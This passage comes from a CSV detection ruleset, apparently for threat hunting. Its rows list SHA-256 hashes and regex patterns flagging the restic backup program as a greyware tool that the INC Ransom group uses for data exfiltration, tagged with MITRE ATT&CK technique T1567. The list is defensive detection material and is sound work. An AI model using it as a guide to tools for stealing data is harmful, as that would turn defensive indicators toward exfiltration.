Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*7e041cc324312bff2d86542c6818e96916caa1e8737ff83cbc39ff9d20fc69f9*",".{0,1000}7e041cc324312bff2d86542c6818e96916caa1e8737ff83cbc39ff9d20fc69f9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*7e1562d7995b291237984eafd847c018c8bf8ba1ac3869749a1622f119bbd8bc*",".{0,1000}7e1562d7995b291237984eafd847c018c8bf8ba1ac3869749a1622f119bbd8bc.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*7e3a066f157ccb8e9fc9319c94561dc9bef52e502d73d9b02c0343f413a8c543*",".{0,1000}7e3a066f157ccb8e9fc9319c94561dc9bef52e502d73d9b02c0343f413a8c543.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*7e3d5037f8e2208067518a513ac921d2bc085beb97840f0939a6ef1d24443346*",".{0,1000}7e3d5037f8e2208067518a513ac921d2bc085beb97840f0939a6ef1d24443346.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*7e58ac2436868f98276bb647edeb7cae2c5cb68a9d4d4aa152b0c80985a72a3a*",".{0,1000}7e58ac2436868f98276bb647edeb7cae2c5cb68a9d4d4aa152b0c80985a72a3a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*7f5d1fdc074adeca5013395f021574003a543c78953ee17a9afe7fc57d628369*",".{0,1000}7f5d1fdc074adeca5013395f021574003a543c78953ee17a9afe7fc57d628369.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*7f797dd35843b42edf29a19340387f2bf230275fc7941a1ef2b67468e9c1445b*",".{0,1000}7f797dd35843b42edf29a19340387f2bf230275fc7941a1ef2b67468e9c1445b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*7fdc003748c1fa5ff0d87a64aaa8a029927596db53ee09248494aaebe3970179*",".{0,1000}7fdc003748c1fa5ff0d87a64aaa8a029927596db53ee09248494aaebe3970179.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*8000e9b99094cdc71aeb1e81ff325681539b44fb3c2ad1b4e68164922b632da0*",".{0,1000}8000e9b99094cdc71aeb1e81ff325681539b44fb3c2ad1b4e68164922b632da0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*80a4f4c0ec5a5397fe7acb53c5e517109ad3a8869440ec0305dd16bb9ee863ea*",".{0,1000}80a4f4c0ec5a5397fe7acb53c5e517109ad3a8869440ec0305dd16bb9ee863ea.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*80aa71e1022cde5a50c19e15148994c1e3218960b0e9a2ba50782711fea564d3*",".{0,1000}80aa71e1022cde5a50c19e15148994c1e3218960b0e9a2ba50782711fea564d3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*80b60adcd06ad0701c0f000d93d52d9bd4147eb0eb17089939b05dea0ae35cfa*",".{0,1000}80b60adcd06ad0701c0f000d93d52d9bd4147eb0eb17089939b05dea0ae35cfa.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*80c53e7d1ba179d07e6f7863c80a7acc4bc06801ce08322e82bad7147ae535d2*",".{0,1000}80c53e7d1ba179d07e6f7863c80a7acc4bc06801ce08322e82bad7147ae535d2.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*8188be37fcc477e98f40d455c59936ba088a9bb32628fa68ea0a3d5c3d6dfc7a*",".{0,1000}8188be37fcc477e98f40d455c59936ba088a9bb32628fa68ea0a3d5c3d6dfc7a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*819fef0b5e052b0f173acbfac84e3e5b672ff5ee789035d02aa813fb5ddcf48f*",".{0,1000}819fef0b5e052b0f173acbfac84e3e5b672ff5ee789035d02aa813fb5ddcf48f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*81a217411829ecaf0af4a391b559a9ab78bb65de31eaa6bac524cc9c58bc4fc3*",".{0,1000}81a217411829ecaf0af4a391b559a9ab78bb65de31eaa6bac524cc9c58bc4fc3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*824cde57cde28cf15e18e2eae0e68dda28ad89c33ddb0d6f01dd999513f35b68*",".{0,1000}824cde57cde28cf15e18e2eae0e68dda28ad89c33ddb0d6f01dd999513f35b68.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*82b2e4933abab5bad7a425ef7122157be4ab660f488f768f719a5b49017cda27*",".{0,1000}82b2e4933abab5bad7a425ef7122157be4ab660f488f768f719a5b49017cda27.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*82c596e4b30f9be61f942b26948a5e51c6910e36073f6c5e531ddca8f60356d1*",".{0,1000}82c596e4b30f9be61f942b26948a5e51c6910e36073f6c5e531ddca8f60356d1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*82e0dfe67afecbff60f4442ca4595984ad82b8515c985857ac067eb4b1737f52*",".{0,1000}82e0dfe67afecbff60f4442ca4595984ad82b8515c985857ac067eb4b1737f52.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*82e8b44fbea744b19d70b11e5c9836526d303680860fa39abed0b69835c64e8a*",".{0,1000}82e8b44fbea744b19d70b11e5c9836526d303680860fa39abed0b69835c64e8a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*83184461da759df6f22da0e53a4a367eccfce3b1e99941521181ce7a03000aaf*",".{0,1000}83184461da759df6f22da0e53a4a367eccfce3b1e99941521181ce7a03000aaf.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*832b7b0c67c63fcc6abb02d937a3b631f86a934cdf85879eb1a0da5705b05c65*",".{0,1000}832b7b0c67c63fcc6abb02d937a3b631f86a934cdf85879eb1a0da5705b05c65.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*8332935d27f531b6c85fe79f76625220391930506c5debb44895cd8269f58b07*",".{0,1000}8332935d27f531b6c85fe79f76625220391930506c5debb44895cd8269f58b07.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*83415b22a293a7dd3445a721aafbfd17b24e8b3f0864d6a68d3f0f70efff4bd9*",".{0,1000}83415b22a293a7dd3445a721aafbfd17b24e8b3f0864d6a68d3f0f70efff4bd9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*8430f80dc17b98fd78aca6f7d635bf12a486687677e15989a891ff4f6d8490a9*",".{0,1000}8430f80dc17b98fd78aca6f7d635bf12a486687677e15989a891ff4f6d8490a9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*84b92d2a8ea328fac12eaa92321d3a5c61374f1dc9c7a9a6e150431b11354854*",".{0,1000}84b92d2a8ea328fac12eaa92321d3a5c61374f1dc9c7a9a6e150431b11354854.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*855ebd0013f114417417fea33f17bbad5fb49a588e93ebc0099f0d2d5f7312a9*",".{0,1000}855ebd0013f114417417fea33f17bbad5fb49a588e93ebc0099f0d2d5f7312a9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*8578d2a63bbedd34669ed4cd8b332fb3aecfd3480ea3ef6d0c692e6fc146cb3e*",".{0,1000}8578d2a63bbedd34669ed4cd8b332fb3aecfd3480ea3ef6d0c692e6fc146cb3e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*85a6408cfb0798dab52335bcb00ac32066376c32daaa75461d43081499bc7de8*",".{0,1000}85a6408cfb0798dab52335bcb00ac32066376c32daaa75461d43081499bc7de8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*86a906672ad815e281944d68af3d0f7e8e48591b727a3215ed06be57dff8b514*",".{0,1000}86a906672ad815e281944d68af3d0f7e8e48591b727a3215ed06be57dff8b514.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*870d0643bce12a91a51947e9fee61b2ccd3b0fd12c21e81bcfcdfd6248f4c287*",".{0,1000}870d0643bce12a91a51947e9fee61b2ccd3b0fd12c21e81bcfcdfd6248f4c287.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*8758130f7aa1639b1b2c24c327114657a819c81cdd229a41f56fe9a6550a2b05*",".{0,1000}8758130f7aa1639b1b2c24c327114657a819c81cdd229a41f56fe9a6550a2b05.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*877754ae2d7a31733ab7ee31c4db2159c63c48899bbbf0e7578ae9067c8bfbdb*",".{0,1000}877754ae2d7a31733ab7ee31c4db2159c63c48899bbbf0e7578ae9067c8bfbdb.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*878dadc0cd51626f39072cd599be261d184cfe894a4447298449def8588072b8*",".{0,1000}878dadc0cd51626f39072cd599be261d184cfe894a4447298449def8588072b8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*879f2aff6d65c4ce886ccd74508a38dc49d4be49c37b98b88af45fb0f908e865*",".{0,1000}879f2aff6d65c4ce886ccd74508a38dc49d4be49c37b98b88af45fb0f908e865.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*88165b5b89b6064df37a9964d660f40ac62db51d6536e459db9aaea6f2b2fc11*",".{0,1000}88165b5b89b6064df37a9964d660f40ac62db51d6536e459db9aaea6f2b2fc11.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*886e67a861f34bcd7094cc4d2bb989d0c3aaf594d11a21fc11d4ffefe136f47f*",".{0,1000}886e67a861f34bcd7094cc4d2bb989d0c3aaf594d11a21fc11d4ffefe136f47f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*887151c88c3be897947ce3159096518d452d30e1006b850a65d951387d2358d3*",".{0,1000}887151c88c3be897947ce3159096518d452d30e1006b850a65d951387d2358d3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*887b0d18cc4158752105774b5b332ab290a51f08e2602b5c140bc2b1368d1b79*",".{0,1000}887b0d18cc4158752105774b5b332ab290a51f08e2602b5c140bc2b1368d1b79.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*888fc4f6a333cad871710fca2227c37bef771323826c5c414492d653858db10a*",".{0,1000}888fc4f6a333cad871710fca2227c37bef771323826c5c414492d653858db10a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*88f70507c3d00c6db0700498561444ba6ca5eff3afff4e0eecf96e7ac3668230*",".{0,1000}88f70507c3d00c6db0700498561444ba6ca5eff3afff4e0eecf96e7ac3668230.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*89866c382c09e09e89fe8548c3cf51c64784c914ab2b308ad7820ec6b2758e91*",".{0,1000}89866c382c09e09e89fe8548c3cf51c64784c914ab2b308ad7820ec6b2758e91.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*89b8fdbc6fab18b4544efbfd2c7929e02f5d5ba66942e8550098f43111b79a6c*",".{0,1000}89b8fdbc6fab18b4544efbfd2c7929e02f5d5ba66942e8550098f43111b79a6c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*8a1df785e99e5bee6541eda2597872088228699c8877d83e5dabe94b07a63828*",".{0,1000}8a1df785e99e5bee6541eda2597872088228699c8877d83e5dabe94b07a63828.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*8b870f77cc8e76422967eb08ea3c420e7f85a8dc689a0b4d66a4d307c20916fd*",".{0,1000}8b870f77cc8e76422967eb08ea3c420e7f85a8dc689a0b4d66a4d307c20916fd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*8beb7234aac02e5ca176c452da12725723691ca186c241953ed4b15643619f58*",".{0,1000}8beb7234aac02e5ca176c452da12725723691ca186c241953ed4b15643619f58.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*8bfe709bb0bb6d4e6976492ee41860bb06da468dd6baa268beaf6ba089c0a263*",".{0,1000}8bfe709bb0bb6d4e6976492ee41860bb06da468dd6baa268beaf6ba089c0a263.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*8c1c0d5652d1d4a77c1c48526fa46eedbaf2d57b96b5a9e632c2b4917449a912*",".{0,1000}8c1c0d5652d1d4a77c1c48526fa46eedbaf2d57b96b5a9e632c2b4917449a912.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*8c341c2d36bae1817b1f31b77d5cc68dce21f30e59dd7ccc444d7b82ac88b7cc*",".{0,1000}8c341c2d36bae1817b1f31b77d5cc68dce21f30e59dd7ccc444d7b82ac88b7cc.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*8c3ca5ddeffaef4c8481b69314dc10d2d8b7da4a2e57b4ad381596d15e9767d2*",".{0,1000}8c3ca5ddeffaef4c8481b69314dc10d2d8b7da4a2e57b4ad381596d15e9767d2.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*8c76b3f974e99232e25a8e2e3f04d15edf581ee94f9deff8ffb147c817359882*",".{0,1000}8c76b3f974e99232e25a8e2e3f04d15edf581ee94f9deff8ffb147c817359882.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*8d2056b0dbb106c28a58f7652a7a40da94e417c951638831e2687ddbbc253594*",".{0,1000}8d2056b0dbb106c28a58f7652a7a40da94e417c951638831e2687ddbbc253594.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*8ddef07fe02333400b850d0893f14117ee05dd831c877a08e54a247da9e2fdbc*",".{0,1000}8ddef07fe02333400b850d0893f14117ee05dd831c877a08e54a247da9e2fdbc.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*8e24b029f4c9625430ab652fd81f3250c0f6d04390f7c5e7f7f19b4a7b9273d0*",".{0,1000}8e24b029f4c9625430ab652fd81f3250c0f6d04390f7c5e7f7f19b4a7b9273d0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*8e52ca779ef1c3d2bc568eb729c3e2452cb767e091348ec45d374dcc4ddf6ec3*",".{0,1000}8e52ca779ef1c3d2bc568eb729c3e2452cb767e091348ec45d374dcc4ddf6ec3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*8f68e92980c29558c0ad80dd89fb6823a710c7545a08ea061318f67e4fedc6db*",".{0,1000}8f68e92980c29558c0ad80dd89fb6823a710c7545a08ea061318f67e4fedc6db.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*8f8eee3e9651b9f7384a323ba3c26a5667a6388ab2ef8e6d869d3cd69b9f7c95*",".{0,1000}8f8eee3e9651b9f7384a323ba3c26a5667a6388ab2ef8e6d869d3cd69b9f7c95.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*8fe928a203b33b847646d9d0e9dcf825903f7379266fab08ec5e44ddec9aa4ed*",".{0,1000}8fe928a203b33b847646d9d0e9dcf825903f7379266fab08ec5e44ddec9aa4ed.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*9010d659ebb3159009acff108d94c8347aa48f1c41c12176a6c7142ef7ddfd05*",".{0,1000}9010d659ebb3159009acff108d94c8347aa48f1c41c12176a6c7142ef7ddfd05.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*9062e56b98173ae9b000e2cf867d388577442863c83ac3b6a48e90a776cf75ad*",".{0,1000}9062e56b98173ae9b000e2cf867d388577442863c83ac3b6a48e90a776cf75ad.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*90ff7409de18be284f8b8e1babe716d653f74b225b37704448fc46edb4b04c3a*",".{0,1000}90ff7409de18be284f8b8e1babe716d653f74b225b37704448fc46edb4b04c3a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*911a1b84f2100d2ac691c0bb28955fd2ab65e76cb2dbe651b21f6072a508e2be*",".{0,1000}911a1b84f2100d2ac691c0bb28955fd2ab65e76cb2dbe651b21f6072a508e2be.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*9198c43abd08b3a09ea59226282447316e13da579713dda2d81a28c37902d2c8*",".{0,1000}9198c43abd08b3a09ea59226282447316e13da579713dda2d81a28c37902d2c8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 